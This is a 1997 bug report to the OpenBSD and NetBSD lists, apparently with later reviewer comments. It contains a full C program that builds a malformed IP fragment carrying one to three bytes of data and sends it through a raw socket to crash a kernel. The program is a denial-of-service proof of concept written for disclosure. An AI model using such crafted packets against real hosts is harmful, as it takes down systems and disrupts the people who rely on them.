panic in ip_raw
- To: bugs_(_at_)_openbsd_(_dot_)_org
- Subject: panic in ip_raw
- From: Ficus carica <fc_(_at_)_parkone_(_dot_)_ci_(_dot_)_oakland_(_dot_)_ca_(_dot_)_us>
- Date: Sun, 27 Jul 1997 15:34:05 -0700
- Cc: bugs_(_at_)_netbsd_(_dot_)_org
/*
 * As far as I understand, buf is a legal IP fragment.
 * 1-3 bytes of fragment data will cause a panic; more does not.
 * ping -pff -s2955 to some interface with an MTU of 1500 bytes
 * will recreate this packet, so I guess the problem lies
 * somewhere before the kernel's own IP fragmentation routines.
 * I don't have a machine I can panic without consequence, so this
 * code is untested. If it doesn't work, mail me for the original.
 */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
/*
 * Raw datagram passed to sendto() in main(). main() sends sizeof(buf)-1
 * = 23 bytes, so the string literal's terminating NUL is not transmitted.
 *
 * Read in the order written, as an RFC 791 IPv4 header, the first 20 bytes are:
 *   45            version 4, header length 5 words (20 bytes)
 *   00            type of service
 *   00 17         total length 23 = 20-byte header + 3 data bytes
 *   D8 29         identification
 *   03 33         flags / fragment offset (flag bits clear, non-zero offset)
 *   FF            time to live
 *   01            protocol 1 (ICMP)
 *   5D 82         header checksum field
 *   01 02 03 04   source address 1.2.3.4
 *   7F 00 00 01   destination address 127.0.0.1
 * followed by the three data bytes FF FF FF.
 *
 * The 3-byte payload matches the report's "1-3 bytes of fragment data"
 * condition, which is the case a reassembly-path length check has to cover.
 */
char buf[] = "\x45\x00\x00\x17\xD8\x29\x03\x33\xFF\x01\x5D\x82"
"\x01\x02\x03\x04\x7F\x00\x00\x01\xFF\xFF\xFF";
/* NOTE(review): the author's "^^ ^^ ^^ ?" marker presumably pointed at the
 * three trailing data bytes; its column alignment was lost in the archive
 * copy -- confirm against the original mail.
 */
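/*
 * Reproducer for the ip_raw panic described in this report: hands the
 * 23-byte datagram in buf, IP header included, to the kernel through a raw
 * socket addressed to 127.0.0.1.
 *
 * Every call is checked so that a run which never reached the kernel's
 * input path (for example because the raw socket could not be opened,
 * which normally requires privilege) is not mistaken for a kernel that
 * survived the packet.
 *
 * Returns 0 if sendto() accepted the datagram, 1 on any failure.
 */
int main(void) {
    struct sockaddr_in thesocket;
    int sockd, on = 1;
    int rc = 1;

    /* Zero the whole address first: the original left sin_port, sin_zero
     * (and sin_len on BSD) as uninitialized stack bytes. */
    memset(&thesocket, 0, sizeof(thesocket));
    thesocket.sin_family = AF_INET;
    thesocket.sin_addr.s_addr = inet_addr("127.0.0.1");

    sockd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (sockd < 0) {
        perror("socket");
        return 1;
    }

    /* IP_HDRINCL: buf already carries its own IP header. */
    if (setsockopt(sockd, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0) {
        perror("setsockopt");
        goto out;
    }

    /* sizeof(buf)-1 drops the string literal's trailing NUL. */
    if (sendto(sockd, buf, sizeof(buf) - 1, 0x0,
               (struct sockaddr *)&thesocket, sizeof(thesocket)) < 0) {
        perror("sendto");
        goto out;
    }
    rc = 0;

out:
    close(sockd);
    return rc;
}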